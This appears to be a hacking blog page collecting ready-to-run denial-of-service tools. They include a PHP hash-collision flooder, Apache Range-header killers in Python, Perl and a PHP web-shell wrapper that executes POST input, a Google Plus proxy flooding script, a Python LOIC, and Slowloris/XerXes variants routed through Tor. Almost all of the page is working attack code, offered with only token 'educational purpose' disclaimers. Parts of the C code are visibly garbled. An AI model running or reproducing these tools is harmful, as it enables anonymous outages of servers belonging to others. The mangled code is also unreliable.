PHP 5.3.x Hash Collision Proof Of Concept Code
Hash collisions in POST Denial-of-service exploit
Examples:
-) Make a single Request, wait for the response and save the response to output0.html
python HashtablePOC.py -u https://host/index.php -v -c 1 -w -o output
-) Take down a server(make 500 requests without waiting for a response):
python HashtablePOC.py -u https://host/index.php -v -c 500
requires Python 2.7
import socket
import sys
import math
import urllib
import string
import time
import urlparse
import argparse
import ssl
def main():
parser = argparse.ArgumentParser(description="Take down a remote PHP Host", prog="PHP Hashtable Exploit")
parser.add_argument("-u", "--url", dest="url", help="Url to attack", required=True)
parser.add_argument("-w", "--wait", dest="wait", action="store_true", default=False, help="wait for Response")
parser.add_argument("-c", "--count", dest="count", type=int, default=1, help="How many requests")
parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output")
parser.add_argument("-f", "--file", dest="file", help="Save payload to file")
parser.add_argument("-o", "--output", dest="output", help="Save Server response to file. This name is only a pattern. HTML Extension will be appended. Implies -w")
parser.add_argument('--version', action='version', version='%(prog)s 2.0')
options = parser.parse_args()
url = urlparse.urlparse(options.url)
if not url.scheme:
print("Please provide a scheme to the URL(http://, https://,..")
sys.exit(1)
host = url.hostname
path = url.path
port = url.port
if not port:
if url.scheme == "https":
port = 443
elif url.scheme == "http":
port = 80
else:
print("Unsupported Protocol %s" % url.scheme)
sys.exit(1)
if not path:
path = "/"
print("Generating Payload...")
payload = generatePayload()
print("Payload generated")
if options.file:
f = open(options.file, 'w')
f.write(payload)
f.close()
print("Payload saved to %s" % options.file)
print("Host: %s" % host)
print("Port: %s" % str(port))
print("path: %s" % path)
print
print
for i in range(options.count):
print("sending Request #%s..." % str(i+1))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if url.scheme == "https":
ssl_sock = ssl.wrap_socket(sock)
ssl_sock.connect((host, port))
ssl_sock.settimeout(None)
else:
sock.connect((host, port))
sock.settimeout(None)
request = """POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 ( .NET CLR 3.5.30729; .NET4.0E)
Content-Length: %s
%s
""" % (path, host, str(len(payload)), payload)
if url.scheme == "https":
ssl_sock.send(request)
else:
sock.send(request)
if options.verbose:
if len(request) > 300:
print(request[:300]+"....")
else:
print(request)
print
if options.wait or options.output:
start = time.clock()
if url.scheme == "https":
data = ssl_sock.recv(1024)
string = ""
while len(data):
string = string + data
data = ssl_sock.recv(1024)
else:
data = sock.recv(1024)
string = ""
while len(data):
string = string + data
data = sock.recv(1024)
elapsed = (time.clock() - start)
print ("Request %s finished" % str(i+1))
print ("Request %s duration: %s" % (str(i+1), elapsed))
split = string.partition("rnrn")
header = split[0]
content = split[2]
if options.verbose:
# only print http header
print
print(header)
print
if options.output:
f = open(options.output+str(i)+".html", 'w')
f.write("rn"+content)
f.close()
if url.scheme == "https":
ssl_sock.close()
sock.close()
else:
sock.close()
def generatePayload():
# Taken from:
# https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
# Note: Default max POST Data Length in PHP is 8388608 bytes (8MB)
# entries with collisions in PHP hashtable hash function
a = {'0':'Ez', '1':'FY', '2':'G8', '3':'H'+chr(23), '4':'D'+chr(122+33)}
# how long should the payload be
length = 7
size = len(a)
post = ""
maxvaluefloat = math.pow(size,length)
maxvalueint = int(math.floor(maxvaluefloat))
for i in range (maxvalueint):
inputstring = base_convert(i, size)
result = inputstring.rjust(length, '0')
for item in a:
result = result.replace(item, a[item])
post += '' + urllib.quote(result) + '=&'
return post;
def base_convert(num, base):
fullalphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
alphabet = fullalphabet[:base]
if (num == 0):
return alphabet[0]
arr = []
base = len(alphabet)
while num:
rem = num % base
num = num // base
arr.append(alphabet[rem])
arr.reverse()
return ''.join(arr)
if __name__ == "__main__":
main()
KillApachePy Range Header DoS
If you are following security trends then you've probably heard about the DoS attack against major number of Apache versions by usage of specially crafted Range header (CVE-2011-3192). Based on the original PoC (killapache.pl) I've made a Python version out of it which is more user friendly and has few program workflow enhancements (automatic usage of maximum (system) allowed thread number, setting custom HTTP method (GET/HEAD/...), custom target page for retrieval, proxy support, etc.)
p.s. Python v2.5.x-v2.7.x is recommended for running this tool
[cc lang="python"]#!/usr/bin/env python
import optparse, os, re, socket, threading, time, urllib, urllib2, urlparse
NAME = "KillApachePy (Range Header DoS CVE-2011-3192)"
VERSION = "0.1d"
AUTHOR = "Miroslav Stampar (http://unconciousmind.blogspot.com | @stamparm)"
LICENSE = "Public domain (FREE)"
SLEEP_TIME = 3 # time to wait for new thread slots (after max number reached)
RANGE_NUMBER = 1024 # number of range subitems forming the DoS payload
USER_AGENT = "KillApachePy (%s)" % VERSION
def attack(url, user_agent=None, method='GET', proxy=None):
url = ("http://%s" % url) if '://' not in url else url
host = urlparse.urlparse(url).netloc
if proxy and not re.match('\Ahttp(s)?://[^:]+:[0-9]+(/)?\Z', proxy, re.I):
print "(x) Invalid proxy address used"
exit(-1)
proxy_support = urllib2.ProxyHandler({'http': proxy} if proxy else {})
opener = urllib2.build_opener(proxy_support)
urllib2.install_opener(opener)
class _MethodRequest(urllib2.Request): # Create any HTTP (e.g. HEAD/PUT/DELETE) request type with urllib2
def set_method(self, method):
self.method = method.upper()
def get_method(self):
return getattr(self, 'method', urllib2.Request.get_method(self))
def _send(check=False): #Send the vulnerable request to the target
if check:
print "(i) Checking target for vulnerability..."
payload = "bytes=0-,%s" % ",".join("5-%d" % item for item in xrange(1, RANGE_NUMBER))
try:
headers = { 'Host': host, 'User-Agent': user_agent or USER_AGENT, 'Range': payload, 'Accept-Encoding': 'gzip, deflate' }
req = _MethodRequest(url, None, headers)
req.set_method(method)
response = urllib2.urlopen(req)
if check:
return response and ('byteranges' in repr(response.headers.headers) or response.code == 206)
except urllib2.URLError, msg:
if any([item in str(msg) for item in ('Too many', 'Connection reset')]):
pass
elif 'timed out' in str(msg):
print "\r(i) Server seems to be choked ('%s')" % msg
else:
print "(x) Connection error ('%s')" % msg
if check or 'Forbidden' in str(msg):
os._exit(-1)
except Exception, msg:
raise
try:
if not _send(check=True):
print "(x) Target does not seem to be vulnerable"
else:
print "(o) Target seems to be vulnerable\n"
quit = False
while not quit:
threads = []
print "(i) Creating new threads..."
try:
while True:
thread = threading.Thread(target=_send)
thread.start()
threads.append(thread)
except KeyboardInterrupt:
quit = True
raise
except Exception, msg:
if 'new thread' in str(msg):
print "(i) Maximum number of new threads created (%d)" % len(threads)
else:
print "(x) Exception occured ('%s')" % msg
finally:
if not quit:
print "(o) Waiting for %d seconds to acquire new threads" % SLEEP_TIME
time.sleep(SLEEP_TIME)
print
except KeyboardInterrupt:
print "\r(x) Ctrl-C was pressed"
os._exit(1)
if __name__ == "__main__":
print "%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR)
parser = optparse.OptionParser(version=VERSION)
parser.add_option("-u", dest="url", help="Target url (e.g. \"http://www.target.com/index.php\")")
parser.add_option("--agent", dest="agent", help="User agent (e.g. \"Mozilla/5.0 (Linux)\")")
parser.add_option("--method", dest="method", default='GET', help="HTTP method used (default: GET)")
parser.add_option("--proxy", dest="proxy", help="Proxy (e.g. \"http://127.0.0.1:8118\")")
options, _ = parser.parse_args()
if options.url:
result = attack(options.url, options.agent, options.method, options.proxy)
else:
parser.print_help()[/cc]
ThcSslDOS
Description
THC has released a DOS tool that exploits SSL renegotiation to perform a denial of service on a given SSL server. It uses renegotiation to constantly trigger new SSL handshakes with the server, using one single TCP connection. See http://www.thc.org/thc-ssl-dos/ . For more information about renegotiation, see InsecureRenegotiation.
Detection
The current version of THC's SSL DOS tool requires the server to honor client-initiated renegotiations in order to work.
[cc lang="bash"]$ python sslyze.py --reneg www.server.com:443 [/cc]
Recommendation
A mitigation against the current version of THC's SSL DOS tool is to prevent the server from honoring client-initiated renegotiations. However, as explained on their website, "The tool can be modified to work without SSL-RENEGOTIATION by just establishing a new TCP connection for every new handshake".
Download here
Killapache DDOS improved
[cc lang="html"]
/*
Devoted my ex-girlfriend Kh. Alana[from Kagan city] (;
k!ll m3 --- s4f3 the fuck'!n w0rldzzzzz
S4(uR4, r00tw0rm __2011__
w4tch u. h4ck u. fuck u.
Pr!v8 2 Publ!c
*/
error_reporting(0);
`chmod -R 777 *`;
?>
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 __ __ __ __ 1 1 /'__`\ /'__`\/\ \__ /'__`\ 0 0 _ __ /\ \/\ \/\ \/\ \ \ ,_\ __ __ __/\ \/\ \ _ __ ___ ___ 1 1 /\`'__\ \ \ \ \ \ \ \ \ \ \/ /\ \/\ \/\ \ \ \ \ \/\`'__\/' __` __`\ 0 0 \ \ \/ \ \ \_\ \ \ \_\ \ \ \_\ \ \_/ \_/ \ \ \_\ \ \ \/ /\ \/\ \/\ \ 1 1 \ \_\ \ \____/\ \____/\ \__\\ \___x___/'\ \____/\ \_\ \ \_\ \_\ \_\ 0 0 \/_/ \/___/ \/___/ \/__/ \/__//__/ \/___/ \/_/ \/_/\/_/\/_/ 1 1 0 0 1 1 >> 4L4N4 K!LL3R 0 0 >> author : S4(uR4 1 1 >> sanjar[at]xakep[dot]ru 0 0 >> Priv8 v.0.1 1 1 >> )c( 2011 0 0 1 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-0
[CHECK] (Vulned : "HTTP/1.1 206 Partial Content") ::
echo " "; ?>
echo "PWD :: ".`pwd`; $tmp1 = "alana_kill3r.sh"; if (is_writable($tmp1)) { ?>
echo"
"; ";
";
//if(!empty($_POST[0])){
echo "
"."[+] Server Test Running :
";
echo "
";
system('curl -I -H "Range : bytes=0-1,0-2" -s '.$_POST["test_url"]);
echo "[ATACK] ::
[LOG] ::
echo "
SYSTEM :: ".`uname -a`;
echo "
ID :: ".`id`;
echo "
DATE :: ".`date`."
";
`touch alana_kill3r.sh`;
$apache_killer = <<
test "$1" == "" && echo $0 requests threads target-url && exit 0
seq 1 $1 | xargs -I{} -P $2 curl -I -H "User-Agent:" \
-H "Range: bytes=0-`printf ',5-%d' {10..1000}`" \
--compress -s $3 | grep HTTP
XPLOIT;
if (!$handle = fopen($tmp1, 'w+')) {
echo "[x] Can't open file ($tmp1)";
exit;
}
if (fwrite($handle, $apache_killer) === FALSE) {
echo "[x] Can't write file ($tmp1)";
exit;
}
echo "
"."[+] ALL OK, xpl0it Writed";
fclose($handle);
} else {
echo "
[x] File $tmp1 has not access to write";
}";
$pwd = "-al";
system("ls ".$pwd);
echo "
echo "
"."[+] Xploit Started with :
";
`chmod +x`.$tmp1;
echo "
root@r00tw0rm:$ ";
system("bash ./".$tmp1." ".$_POST["request"]." ".$_POST["threads"]." ".$_POST["url"]);
echo "
?>
[/cc]
Slow HTTP DoS tool – slowhttptest
Slow HTTP DoS attacks rely on the fact that the HTTP protocol, by design, requires requests to be completely received by the server before they are processed. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. If the server keeps too many resources busy, this creates a denial of service. This tool is sending partial HTTP requests, trying to get denial of service from target HTTP server.
This tool actively tests if it's possible to acquire enough resources on HTTP server by slowing down requests to get denial of service at application layer.
install:
[cc lang="bash"]tar -xzvf slowhttptest-1.0.tar.gz
cd slowhttptest-1.0
./configure –prefix=PREFIX
make
make install[/cc]
example:
[cc lang="bash"]./slowhttptest -c 1000 -B -g -o my_server_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/index.html -x 10[/cc]
Google Plus DDoS attack script
[cc lang="bash"]#!/bin/bash
# Bug found by #
# Simone 'R00T_ATI' Quatrini #
# Mauro 'epicfail' Gasperini #
# Site: http://www.ihteam.net #
function start {
echo "[*] Sending `echo $2` Requests..."
for a in `seq $2`
do
id=$((RANDOM%3999999+3000000))
nohup curl "https://plus.google.com/_/sharebox/linkpreview/?c=$url&t=1&_reqid=$id&rt=j" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
nohup curl "https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=$urlclear&container=focus" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
done
echo "[*] Still attacking `echo $urlclear`"
echo "[*] Sleeping for 10 Seconds"
sleep 10
start url $2 urlclear
}
echo ''
echo ' 88888888ba, 88888888ba, ad88888ba '
echo ' aa 88 `"8b 88 `"8b d8" "8b '
echo ' 88 88 `8b 88 `8b Y8, '
echo 'aaaa88aaaa 88 88 88 88 ,adPPYba, `Y8aaaaa, '
echo '""""88"""" 88 88 88 88 a8" "8a `"""""8b, '
echo ' 88 88 8P 88 8P 8b d8 `8b '
echo ' "" 88 .a8P 88 .a8P "8a, ,a8" Y8a a8P '
echo ' 88888888Y"" 88888888Y"" `"YbbdP"" "Y88888P"'
echo ''
if [ "$#" -lt 2 ]; then
echo "Usage: $0
echo "Example: $0 http://www.site.com/very_big_file.tar.gz 1000"
echo ""
exit 0
fi
case $2 in
*[!0-9]* ) echo "$2 is not numeric" && exit 1;;
esac
echo "Attack -->" $1
match1=/
repl1=%2F
match2=:
repl2=%3A
url=$1
urlclear=$1
url=${url//$match1/$repl1}
url=${url//$match2/$repl2}
echo ""
echo "[*] Loop started! CTRL+C to stop"
echo ""
start url $2 urlclear[/cc]
Educational purpose only. Do not start a DDoS attack on servers that you do not own.
source here and author
Apache httpd Remote Denial of Service – Killapache
[cc lang="perl"]#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#
use IO::Socket;
use Parallel::ForkManager;
sub usage {
print "Apache Remote Denial of Service (memory exhaustion)\n";
print "by Kingcope\n";
print "usage: perl killapache.pl
print "example: perl killapache.pl www.example.com 50\n";
}
sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";
$pm = new Parallel::ForkManager($numforks);
$|=1;
srand(time());
$p = "";
for ($k=0;$k<1300;$k++) {
$p .= ",5-$k";
}
for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next;
$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "80",
Proto => 'tcp');
$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;
while(<$sock>) {
}
$pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}
sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "80",
Proto => 'tcp');
$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;
$x = <$sock>;
if ($x =~ /Partial/) {
print "host seems vuln\n";
return 1;
} else {
return 0;
}
}
if ($#ARGV < 0) {
usage;
exit;
}
if ($#ARGV > 1) {
$numforks = $ARGV[1];
} else {$numforks = 50;}
$v = testapache();
if ($v == 0) {
print "Host does not seem vulnerable\n";
exit;
}
while(1) {
killapache();
}[/cc]
Python Low Orbit Ion Cannon released – PythonLOIC – source
Python low orbit ion cannon
Here it is:
[cc lang="python"]
# -*- coding: cp1252 -*-
import time
import os
from ftplib import *
import urllib.request
import socket
import re
liste=['whoami', 'whois', 'ping', 'ddos', 'help', 'http','del history','history','flood','ip']
fin = False
adieu = ['bye', 'salut', 'a+', 'ciao', 'exit','quit','killme','kill','stfu','see you','au revoir']
help = ' DDOSPING for ddossing with ping of the death \n HTTP for ddossing with http \n PING just to ping a server\n FLOOD to flood with pings (need administrador account) \n HISTORY to show history \n DEL HISTORY to delete the history \n CTRL+C or EXIT to quit\n WHOIS to whois\n WHOAMI if you are amnesic\n IP to see your current ip adress'
a=0;b=0;com=100;cm=100
title = '--------------------------------------------'
body = '~~~~~~~~~~~~~~~~~~~~~'
O = ''
lignes=''
run = 'RUNNING'
ip = lignes
print (title+'\npython L.O.I.C for python 3.2 Version 2\n'+title)
print ('HELP for commands and help')
print (body+"\nI'm not responsable of your acts with this software. \nJe ne suis pas responsable de vos actes avec ce logiciel.\n"+body)
while fin == False:
command=input('Hunt:\ ').lower()
if command == 'ddosping':
site = input('ping of the death ... to: ')
if site == 'cancel':
break
fichier = open('history.txt', 'a')
fichier.write("ddos "+site+"\n")
fichier.close()
cm = int(input('how many times?: '))
while a <= cm:
print ("running ddossing...".upper())
ping=os.popen("ping " + site)
a += 1
print (a)
else:
print (run.capitalize(),'ddosing...'.upper())
s = int(input("size of packets?"))
s = " -s "+str(s)
load = int(input("numbers of packets"))
load = " -l "+str(load)
site = site + '-t -f '+s +load
com = int(input("How many times??: "))
print ("running ddossing".upper())
while b < com:
ping=os.popen("ping " + site)
b += 1
print (b)
fichier = open('history.txt', 'a')
fichier.write("ping "+site+'\n')
fichier.close()
if command == 'del history':
fichier = open('history.txt', 'w')
fichier.write('')
fichier.close()
print("History deleted")
if command == 'history':
print ('History: \n')
try:
fichier = open('history.txt', 'r')
print(fichier.read())
fichier.close()
except IOError:
print ('Not found !')
if command == 'ping':
pingsites = input('to~> ')
hm = str(input("How many pings ? "))
wi = str(input("What interval ? in sec "))
os.system('ping -c '+hm+' -i '+wi+' '+pingsites)
fichier = open('history.txt', 'a')
fichier.write("ping "+pingsites+'\n')
fichier.close()
if command == 'flood':
os1=['fedora']
os2=['debian','mac os','ubuntu']
pingsites = input('ping to~> ')
hm = str(input("How many pings ? "))
flood = str('ping -c '+hm+' -f '+pingsites)
try:
fdmu = str(input("On what OS are you ? fedora/debian/mac os/ubuntu\n")).lower()
except:
print("Please choose an OS.")
if fdmu in os1:
os.system('su -c '+"'"+flood+"'")
if fdmu in os2:
os.system('sudo '+flood)
if fdmu not in os1 and os2:
print("This OS is not supported")
fichier = open('history.txt', 'a')
fichier.write("pingflood "+pingsites+'\n')
fichier.close()
if command == 'http':
e = 0
httpsite = input("to~> ")
hwt = int(input("How many times ? "))
fichier = open('history.txt', 'a')
fichier.write("httpddos "+httpsite+"\n")
fichier.close()
while e<=hwt:
with urllib.request.urlopen('http://'+httpsite+'/') as page:
page.read()
e += 1
print (e)
if command == 'whois':
whoisname = input("Who ? ")
os.system("whois "+whoisname)
fichier = open('history.txt', 'a')
fichier.write("whois "+whoisname+"\n")
fichier.close()
if command == 'whoami':
os.system("whoami")
if command == 'help':
print (help)
if command == 'ip':
print ('local ip: '+socket.gethostbyname(socket.gethostname())+'\nFinding external ip, will take a while')
print('external ip: '+str(urllib.request.urlopen("http://automation.whatismyip.com/n09230945.asp").read(), "utf8"))
if command in adieu:
fin=True
elif command not in liste:
print ('> ?!')
print ("Good bye")
quit()[/cc]
Other versions here
Educational purpose only! I am not responsible for any illegal usage / damage made by this tool.
Slowloris with a twist over tor
Someone decided to post this on fulldisclosure.
Posted only for educational purpose only.
[cc lang="c"]/* =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
* Slowloris with a twist over tor
* =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
*
* Due to the alpha version of this code being leaked I've decided
* to release an improved version to fully show this method of
* attack mostly free of the bugs / dependency on torsocks. This
* attack works on a similar idea of slowloris only it sends packets
* containing a single 0x00 and optionally nothing causing Apache
* to keep the connection alive almost indefinitely.
*
* Due to no one knowing how th3j35t3r's XerXes works I can not say
* if this is the same method. This was one of my many ideas I was
* exploring as to how it could possibly work that has some successful
* results.
*
* - SanguineRose / William Welna
*
* Leaked Version
* http://seclists.org/fulldisclosure/2011/Jul/84
*/
#include /* Re-connecting to tor sometimes takes a while, in order for this to be effective it requires typedef struct { // Simple debug function int make_socket(const char *host, const char *port) { /* Opens SOCKS5 connection to tor // This is for the SIGPIPE error on bad connections / premature closing void *attack(void *arg) { void do_help(char *n) { void *cycle_identity() { int main(int argc, char **argv) {
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
* mass amounts of threads handling only a few connections each, since this is a POC I will leave
* it up to others to fix that. It also has limited success/attack lengths due to tor being slow
*/
#define CONNECTIONS 3
#define THREADS 148
const char *host, *port;
} thread_args;
void dump_array(char *name, char *data, int size) {
int x, z, indent = strlen(name) + 2;
fprintf(stderr, "%s { ", name);
for(x=0; x < size; x++) {
for(z=0; z < indent; z++)
putc(0x20, stderr);
fprintf(stderr, "%20x\n", data[x]);
}
fprintf(stderr, "};\n");
}
struct addrinfo hints, *servinfo, *p;
int sock, r, y=1;
memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
return -1;
}
for(p = servinfo; p != NULL; p = p->ai_next) {
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
continue;
}
setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &y, 4);
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
close(sock);
continue;
}
break;
}
if(p == NULL) {
if(servinfo)
freeaddrinfo(servinfo);
return -2;
}
if(servinfo)
freeaddrinfo(servinfo);
return sock;
}
* I also dedicate this function to pr0f <3
*/
int pr0f_loves_me_tor_connect(const char *host, const char *port) {
char *buf = calloc(1024, sizeof(char));
short l = strlen(host), t;
int x, sock;
fprintf(stderr, "[Connect %s:%s]\n", host, port);
if((sock=make_socket("127.0.0.1", "9050"))<0) {
free(buf);
return sock;
}
write(sock, "\x05\x01\x00", 3); // SOCKS5, 1 Authentication Method, No Auth/Plain
read(sock, buf, 1024);
if((buf[0] != 0x05) || (buf[1] == 0xFF) || (buf[1] != 0x00)) {
free(buf);
return -3; // Auth not accepted by socks server / wrong version
}
buf[0] = 0x05; buf[1] = 0x01; buf[2] = 0x00; buf[3] = 0x03; buf[4] = l;
for(x=0; x < l; x++)
buf[5+x] = host[x];
x=l+5;
t = htons(atoi(port));
memcpy((buf+x), &t, 2);
//dump_array("final_request", buf, x+2);
write(sock, buf, x+2);// send request
read(sock, buf, 1024);
if((buf[0] == 0x05) && (buf[1] == 0x00)) { // connection granted/success
free(buf);
return sock;
}
free(buf);
return -4; // Unable to conect
}
void broke(int s) {
// do nothing
}
thread_args *a = (thread_args *)arg;
int x, r, socks[CONNECTIONS];
fprintf(stderr, "[Thread Started]\n");
for(x=0; x < CONNECTIONS; x++)
socks[x]=0;
signal(SIGPIPE, &broke);
while(1) {
for(x=0; x < CONNECTIONS; x++) {
if(socks[x] <= 0) {
socks[x] = pr0f_loves_me_tor_connect(a->host, a->port);
fprintf(stderr, "[Socket Returned %i]\n", socks[x]);
}
if(write(socks[x], "\0", 1) < 0) {
close(socks[x]);
fprintf(stderr, "[Socket Error Returned %i]\n", socks[x]);
socks[x] = pr0f_loves_me_tor_connect(a->host, a->port);
}
}
usleep(100000);
}
}
fprintf(stderr, "Usage: %s
exit(0);
}
int sock = make_socket("localhost", "9051");
char *shit_bucket = calloc(1024, sizeof(char));
if(sock < 0) {
fprintf(stderr, "Can't connect to tor control port\n");
free(shit_bucket);
pthread_exit(NULL);
}
write(sock, "AUTHENTICATE \"\"\n", 16);
while(1) {
write(sock, "signal NEWNYM\n", 15);
fprintf(stderr, "[cycle_identity -> signal NEWNYM\n");
read(sock, shit_bucket, 1024);
sleep(5);
}
}
pthread_t threads[THREADS];
pthread_t cycle_tid;
thread_args arg;
void *status;
int x;
if(argc != 3)
do_help(argv[0]);
arg.host = (const char *)argv[1];
arg.port = (const char *)argv[2];
pthread_create(&cycle_tid, NULL, cycle_identity, NULL);
for(x=0; x < THREADS; x++) {
pthread_create(&threads[x], NULL, attack, &arg);
usleep(200000);
}
for(x=0; x < THREADS; x++)
pthread_join(threads[x], &status);
pthread_kill(cycle_tid, 15);
pthread_exit(NULL);
return 0;
}[/cc]
XerXes Source Code DoS tool download
[cc lang="c"]#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int make_socket(char *host, char *port) {
struct addrinfo hints, *servinfo, *p;
int sock, r;
// fprintf(stderr, "[Connecting -> %s:%s\n", host, port);
memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
exit(0);
}
for(p = servinfo; p != NULL; p = p->ai_next) {
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
continue;
}
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
close(sock);
continue;
}
break;
}
if(p == NULL) {
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "No connection could be made\n");
exit(0);
}
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "[Connected -> %s:%s]\n", host, port);
return sock;
}
void broke(int s) {
// do nothing
}
#define CONNECTIONS 8
#define THREADS 48
void attack(char *host, char *port, int id) {
int sockets[CONNECTIONS];
int x, g=1, r;
for(x=0; x!= CONNECTIONS; x++)
sockets[x]=0;
signal(SIGPIPE, &broke);
while(1) {
for(x=0; x != CONNECTIONS; x++) {
if(sockets[x] == 0)
sockets[x] = make_socket(host, port);
r=write(sockets[x], "\0", 1);
if(r == -1) {
close(sockets[x]);
sockets[x] = make_socket(host, port);
} else
// fprintf(stderr, "Socket[%i->%i] -> %i\n", x, sockets[x], r);
fprintf(stderr, "[%i: Voly Sent]\n", id);
}
fprintf(stderr, "[%i: Voly Sent]\n", id);
usleep(300000);
}
}
void cycle_identity() {
int r;
int socket = make_socket("localhost", "9050");
write(socket, "AUTHENTICATE \"\"\n", 16);
while(1) {
r=write(socket, "signal NEWNYM\n\x00", 16);
fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r);
usleep(300000);
}
}
int main(int argc, char **argv) {
int x;
if(argc !=3)
cycle_identity();
for(x=0; x != THREADS; x++) {
if(fork())
attack(argv[1], argv[2], x);
usleep(200000);
}
getc(stdin);
return 0;
}[/cc]
made by The Jester based on torsocks
Disclaimer
Categories
- android (1)
- antivirus (1)
- backup (1)
- backup exec (2)
- bruteforce (6)
- conference (2)
- CRSF (2)
- DirectAdmin (1)
- DoS (11)
- enumeration (2)
- Fără categorie (2)
- flash (2)
- Fuzzer (2)
- games (1)
- hacking (116)
- how-to (32)
- Information gathering (2)
- lfi (3)
- linux (27)
- mobile (1)
- ms exchange (2)
- News (2)
- Phishing (1)
- php (1)
- rdp (1)
- rfi (5)
- rootkit (1)
- scripts (33)
- seo (1)
- sniff (3)
- social engineering (2)
- source code (33)
- sqli (16)
- ssh (2)
- symantec (3)
- tools (73)
- tutorials (20)
- tutorials (1)
- Uncategorized (7)
- vranger (1)
- windows (12)
- wireless (1)
- wsus (1)
- xpath (1)
- xsrf (1)
- xss (12)
